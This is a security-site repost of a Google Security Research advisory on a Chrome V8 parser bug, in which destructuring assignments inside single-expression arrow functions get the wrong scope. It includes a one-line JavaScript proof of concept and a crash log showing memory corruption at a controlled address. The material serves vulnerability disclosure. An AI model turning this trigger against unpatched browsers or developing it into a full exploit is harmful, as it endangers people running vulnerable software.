首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Chrome V8 JIT - Arrow Function Scope Fixing Bug
来源:Google Security Research 作者:Google 发布时间:2018-04-26  
/*
When the parser parses the parameter list of an arrow function contaning destructuring assignments, it can't distinguish whether the assignments will be actually in the parameter list or just assignments until it meets a "=>" token. So it first assigns the destructuring assignments to the outer scope, and fixs the scope when it meets the "=>" token.
 
Here's the methods used to fix the scope (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=407).
 
    void RewindDestructuringAssignments(int pos) {
      destructuring_assignments_to_rewrite_.Rewind(pos);
    }
 
    void SetDestructuringAssignmentsScope(int pos, Scope* scope) {
      for (int i = pos; i < destructuring_assignments_to_rewrite_.length();
           ++i) {
        destructuring_assignments_to_rewrite_[i]->set_scope(scope);
      }
    }
 
Since the SetDestructuringAssignmentsScope method changes the scope from "pos" to the end of the list, it needs to call the RewindDestructuringAssignments method after fixing the scope. But the RewindDestructuringAssignments method is only called when the arrow function's body starts with a "{" token (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=4418).
 
So it can't properly handle the following case where a destructuring assignment expression containing a single line arrow function. It will set the scope of the inner destructuring assignments to the outer arrow function's scope.
 
PoC:
*/
 
(({a = (async ({b = {a = c} = {
    a: 0x1234
}}) => 1)({})}, c) => 1)({});
 
/*
Log:
Received signal 10 BUS_ADRERR 12340000001f
 
==== C stack trace ===============================
 
 [0x00010edde85e]
 [0x7fff53e54f5a]
 [0x000000000000]
 [0x7eb48331b6d8]
 [0x7eb48331b6d8]
[end of stack trace]
Bus error: 10
*/
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chrome V8 JIT - 'AwaitedPromis
·SickRage < v2018.03.09 - Clear
·VMware Workstation 12.5.2 - Dr
·GitList 0.6 - Unauthenticated
·Easy File Sharing Web Server 7
·Allok AVI to DVD SVCD VCD Conv
·Allok Video to DVD Burner 2.6.
·Drupal Drupalgeddon 2 Forms AP
·R 3.4.4 - Local Buffer Overflo
·osCommerce Installer Unauthent
·Ericsson-LG iPECS NMS A.1Ac -
·Oracle Weblogic Server 10.3.6.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved